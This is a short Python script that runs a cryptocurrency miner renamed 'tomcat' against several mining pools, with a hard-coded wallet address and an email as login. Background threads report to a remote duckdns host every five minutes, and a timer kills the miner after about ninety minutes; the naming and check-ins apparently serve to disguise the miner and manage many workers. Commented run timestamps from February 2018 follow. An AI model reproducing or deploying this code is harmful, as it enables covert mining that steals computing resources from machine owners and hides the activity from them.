import os, requests, datetime, threading
from time import sleep

def os_print(text):
    os.system('echo {text}'.format(text=text))

def send_signal(is_beacon=False):
    with open('id', 'r') as f:
        worker_name = f.read()
    if is_beacon:
        url = 'http://anthill.duckdns.org:1784/cms/beacon/'
    else:
        url = 'http://anthill.duckdns.org:1784/cms/'
    try:
        requests.post(url, data={'worker': worker_name}, timeout=5)
    except:
        print('err send_signal()')

class WatchDog():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        sleep(self.interval)
        os_print('WatchDog - {dt}'.format(dt=datetime.datetime.now()))
        os.system('killall tomcat')
        send_signal(is_beacon=False)

class Beacon():
    def __init__(self, interval):
        self.interval = interval
        thread = threading.Thread(target=self.run, args=())
        thread.start()

    def run(self):
        for i in range(0, 18) :
            os_print('{dt}'.format(dt=datetime.datetime.now()))
            send_signal(is_beacon=True)
            sleep(self.interval)

def main():
    Beacon(60*5)  # 5 min
    WatchDog((60*90)+60)  #5400 1.5 h
    #os.system('./tomcat -a cryptonight -o stratum+tcp://xmr.pool.minergate.com:45560 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://bcn.pool.minergate.com:45550 -u andrey.vorobyov@mail.com -p x -t 1')
    #os.system('./tomcat -a cryptonight -o stratum+tcp://etn.easyhash.io:3630 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os.system('./tomcat -a cryptonight -o stratum+tcp://etn-us-west1.nanopool.org:13333 -u etnk4TMu1wX6iXZB3G9QHXXD44cC5cUsL9gsGcZzdZ3mU7BKRH6C3pRHEgqVj3skppLcKHP9X6BbYejRV2ipW7nn6tLYZ81s4Z -p x -t 1')
    os_print('FINISH!!!')

if __name__ == '__main__':
    main()

#2018-02-17 15:08:07.572648
#2018-02-17 16:54:05.229425
#2018-02-17 18:42:05.082666
#2018-02-17 20:32:07.128847
#2018-02-17 22:18:06.160996
#2018-02-18 00:02:06.403107
#2018-02-18 01:53:06.243297
#2018-02-18 03:40:08.507970
#2018-02-18 05:27:03.337290
#2018-02-18 07:18:06.886221
#2018-02-18 09:07:05.999269
#2018-02-18 10:53:07.169879
#2018-02-18 12:40:07.112841
#2018-02-18 14:27:04.501968
#2018-02-18 16:17:01.600828
#2018-02-18 18:06:03.654785
#2018-02-18 19:52:06.020304
#2018-02-18 21:38:06.452696
#2018-02-18 23:25:08.306159
#2018-02-19 01:12:06.064192
#2018-02-19 02:58:05.588588
#2018-02-19 04:45:09.536028
#2018-02-19 06:31:03.227607
#2018-02-19 08:20:09.026901
#2018-02-19 10:08:08.265368
#2018-02-19 11:57:06.762862
#2018-02-19 13:44:01.955495
#2018-02-19 15:33:04.542414
#2018-02-19 17:19:09.347122
#2018-02-19 19:06:04.376502
#2018-02-19 20:51:04.189142
#2018-02-19 22:38:08.256297
#2018-02-20 00:24:04.289160
#2018-02-20 02:11:08.032764
#2018-02-20 04:03:06.426550
#2018-02-20 05:46:06.468205
#2018-02-20 07:32:01.390052
#2018-02-20 09:16:06.097499
#2018-02-20 10:59:01.467739
#2018-02-20 12:46:12.371368
#2018-02-20 14:30:04.540270
#2018-02-20 16:15:11.835381
#2018-02-20 18:02:01.420801
#2018-02-20 19:52:06.533131
#2018-02-20 21:38:07.505804
#2018-02-20 23:19:04.455106
#2018-02-21 01:03:01.784315
#2018-02-21 02:49:01.773831
#2018-02-21 04:37:04.976114
#2018-02-21 06:25:03.622773
#2018-02-21 08:11:03.532179
#2018-02-21 09:57:04.912217
#2018-02-21 11:44:02.064518
#2018-02-21 13:36:01.406613
#2018-02-21 15:20:11.271488
#2018-02-21 17:11:11.506954
#2018-02-21 18:58:08.561663
#2018-02-21 20:47:01.992899
#2018-02-21 22:32:01.968569
#2018-02-22 00:21:09.571245
#2018-02-22 02:08:05.669219
#2018-02-22 03:54:05.013723
#2018-02-22 05:40:06.075988
#2018-02-22 07:25:03.831891
#2018-02-22 09:12:06.893146
#2018-02-22 10:59:07.035754
#2018-02-22 12:44:07.199658
#2018-02-22 14:29:06.505970
#2018-02-22 16:15:13.292221
#2018-02-22 18:03:02.014156
#2018-02-22 19:51:02.091821
#2018-02-22 21:39:08.213133
#2018-02-22 23:26:02.182684
#2018-02-23 01:13:02.151406
#2018-02-23 03:02:04.326498
#2018-02-23 04:47:05.324485
#2018-02-23 06:33:01.489971
#2018-02-23 08:19:04.149728
#2018-02-23 10:35:08.006631
#2018-02-23 12:27:09.253370
#2018-02-23 14:14:08.280932
#2018-02-23 16:04:05.323129
#2018-02-23 17:49:02.252083
#2018-02-23 19:35:02.531880
#2018-02-23 21:17:08.113045
#2018-02-23 23:05:04.786646
#2018-02-24 00:53:05.573140
#2018-02-24 02:48:07.190517
#2018-02-24 04:38:06.335208
#2018-02-24 06:22:04.230746
#2018-02-24 08:10:04.159550
#2018-02-24 09:53:05.713562
#2018-02-24 11:48:05.328875
#2018-02-24 13:39:06.673771
#2018-02-24 15:27:01.901507
#2018-02-24 17:17:05.916319
#2018-02-24 19:08:03.661457
#2018-02-24 20:56:07.719530
#2018-02-24 23:23:05.416334
#2018-02-25 02:47:07.282160
#2018-02-25 06:24:07.632174
#2018-02-25 11:39:08.005036